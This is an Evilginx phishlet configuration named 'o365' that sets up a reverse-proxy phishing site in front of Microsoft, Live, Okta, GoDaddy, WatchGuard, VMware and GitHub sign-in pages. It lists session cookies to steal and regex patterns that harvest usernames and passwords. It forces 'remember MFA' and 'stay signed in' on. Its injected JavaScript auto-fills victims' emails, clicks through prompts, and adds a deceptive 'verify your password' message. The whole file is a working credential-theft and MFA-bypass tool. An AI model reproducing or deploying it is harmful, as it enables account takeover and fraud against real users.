name: "o365"
author: '@kkrasta_ginx'
min_ver: '2.4.2'
proxy_hosts:
  - {phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false }
  - {phish_sub: "9kXkj", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false }
  - {phish_sub: "wo3Ih", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false }
  - {phish_sub: "b2t0Y", orig_sub: "o", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - {phish_sub: "bG9na", orig_sub: "login", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - {phish_sub: "lbGl2", orig_sub: "login", domain: "live.com", session: true, is_landing: false, auto_filter: false }
  - {phish_sub: "YWNjb", orig_sub: "account", domain: "live.com", session: true, is_landing: false, auto_filter: false }
  - {phish_sub: "b3V0b", orig_sub: "outlook", domain: "live.com", session: true, is_landing: false }
  - {phish_sub: "sso", orig_sub: "sso", domain: "godaddy.com", session: true, is_landing: false, auto_filter: true  }
  - {phish_sub: "sso", orig_sub: "sso", domain: "secureserver.net", session: true, is_landing: false, auto_filter: true}
  - {phish_sub: "ulgroup", orig_sub: "ulgroup", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - {phish_sub: "vn3Hg", orig_sub: "aadcdn", domain: "msauth.net", session: true, is_landing: false }
  - {phish_sub: '', orig_sub: '', domain: 'office.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: '', orig_sub: '', domain: 'godaddy.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: '', orig_sub: '', domain: 'secureserver.net', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'usa.authpoint', orig_sub: 'usa.authpoint', domain: 'watchguard.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'sp.authpoint', orig_sub: 'sp.authpoint', domain: 'watchguard.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'cloud', orig_sub: 'cloud', domain: 'xcentric.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'dfi', orig_sub: 'dfi', domain: 'vmwareidentity.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'cas-aws', orig_sub: 'cas-aws', domain: 'vmwareidentity.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'github', orig_sub: 'github', domain: 'github.com', session: true, is_landing: false, auto_filter: true }

sub_filters:
  - {triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript]}
  - {triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com/o/saml2/idp', replace: 'accounts.{domain}/o/saml2/idp', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - {triggers_on: "login.microsoftonline.com", orig_sub: "aadcdn", domain: "msauth.net", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }

  - {triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - {triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }

  - {triggers_on: "login.live.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "login.live.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }

  - {triggers_on: "account.live.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "account.live.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "account.live.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - {triggers_on: "account.live.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie', 'esctx', 'brcap', '.*,regexp']

  - domain: 'login.microsoftonline.com'
    keys: ['ESTSSC', 'ESTSAUTHLIGHT','buid', 'fpc', 'stsservicecookie', 'x-ms-gateway-slice', '.*,regexp']

  - domain: '.live.com'
    keys: ['wlidperf', 'PPLState', 'MSPProf', 'NAP', 'ANON', 'WLSSC', 'MSPAuth', 'RPSSecAuth', '.*,regexp']

  - domain: '.login.live.com'
    keys: ['MSCC', 'OParams', 'MSPOK','JSHP', 'JSH', 'SDIDC', 'MSPBack','MSPSoftVis', 'uaid', 'MSPRequ', '.*,regexp']

  - domain: 'login.live.com'
    keys: ['__Host-MSAAUTH', '.*,regexp']

  - domain: 'outlook.live.com'
    keys: ['DefaultAnchorMailbox', 'O365Consumer', 'SuiteServiceProxyKey', 'X-OWA-CANARY', 'ClientId', 'exchangecookie', 'orgName', 'domainName', 'LI', 'UC', 'RoutingKeyCookie', '.*,regexp']
  
  - domain: 'sso.godaddy.com'
    keys: ['akm_lmprb-ssn', 'akm_lmprb', 'wtrealm', 'wctx', 'username', 'client-request-id', 'uxp-ns', 'domain', 'realm', 'app', '.*,regexp']

  - domain: 'sso.secureserver.net'
    keys: ['.*,regexp']

  - domain: 'usa.authpoint.watchguard.com'
    keys: ['accountId', 'spRequestId', '.*,regexp']

  - domain: 'sp.authpoint.watchguard.com'
    keys: ['SAMLRequest', 'RelayState', 'username', 'accountId', 'samlRequest', 'user', '.*,regexp']

  - domain: 'cloud.xcentric.com'
    keys: ['NSC_DMPVE_QSPE_MCT_TTM', 'NSC_ESNS', '.AspNetCore.Antiforgery.eis4G1e_YDg', '.*,regexp']

  - domain: 'dfi.vmwareidentity.com'
    keys: ['domainid', 'AWSALB', 'AWSALBCORS', 'CKE_CHECK', 'JSESSIONID', '.*,regexp']

  - domain: 'cas-aws.vmwareidentity.com'
    keys: ['EAB_CALLBACK_URL', 'Idm-Trace-Id', 'CKE_CHECK', 'cbcxt', '.*,regexp']


force_post:
  - path: '/kmsi'
    search: 
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search: 
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post'
  - path: "/ppsecure/post*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"
  - path: "/login.srf*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"

auth_urls:
  - "/kmsi*"
  - "/ppsecure/post.srf*"
  - "/owa/prefetch.aspx*"
  - "/webmanifest.json*"
  - "/landingv2"
  - "/login.srf"
  
credentials:
  username:
    key: "(login|UserName|username|email|account|f.req)"
    search: '(.*)'
    type: "json"
  password:
    key: "(passwd|Password|password|login_password|pass|pwd|session_password|PASSWORD|API_HOST|f.req)"
    search: '(.*)'
    type: "json"
  custom:
    - key: (login|UserName|username|email|account)
      search: '(.*)'
    - key: (passwd|Password|password|login_password|pass|pwd|session_password|PASSWORD|API_HOST)
      search: '(.*)'

login:
  domain: "login.microsoftonline.com"
  path: "/"

js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/common/login", "/login.srf"]
    script: |
      function autoBtnClick() {
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#KmsiCheckboxField").then((elm) => {
          if (document.getElementById("KmsiCheckboxField") != null) {
            setTimeout(() => {document.getElementById("idSIButton9").click()}, 1000);
          } else {setTimeout(() => {autoBtnClick()}, 1000)}
        });
      }
      setTimeout(() => {autoBtnClick()}, 1500);
  
  - trigger_domains: ["login.live.com"]
    trigger_paths: ["/common/login"]
    script: |
      function autoBtnClick() {
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#KmsiCheckboxField").then((elm) => {
          if (document.getElementById("KmsiCheckboxField") != null) {
            setTimeout(() => {document.getElementById("idSIButton9").click()}, 1000);
          } else {setTimeout(() => {autoBtnClick()}, 1000)}
        });
      }
      setTimeout(() => {autoBtnClick()}, 1500);

  - trigger_domains: ["login.microsoftonline.com", "login.live.com"]
    trigger_paths: ["/common/oauth2/", "/", "/*"]
    script: |
      window.addEventListener("load", () => {

        function isBase64(str) {
          if (str === '' || str.trim() === ''){return false}
          try {if (btoa(atob(str)) == atob(btoa(str))) return true} catch {return false}
        }

        var email = window.location.hash.substring(1); email = isBase64(email) ? window.atob(email) : email
        email = email.replace("=", "")
       
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}

        waitForElm("#i0116").then((elm) => {elm.focus();elm.value = email; const submBtn = document.querySelector("#idSIButton9");submBtn.focus(); submBtn.click()});

        waitForElm("#loginHeader").then((elm) => {let p = document.createElement('p');p.textContent = "Because you're accessing sensitive information you need to verify your password";document.querySelectorAll("#loginHeader")[0].appendChild(p)});
      
      });
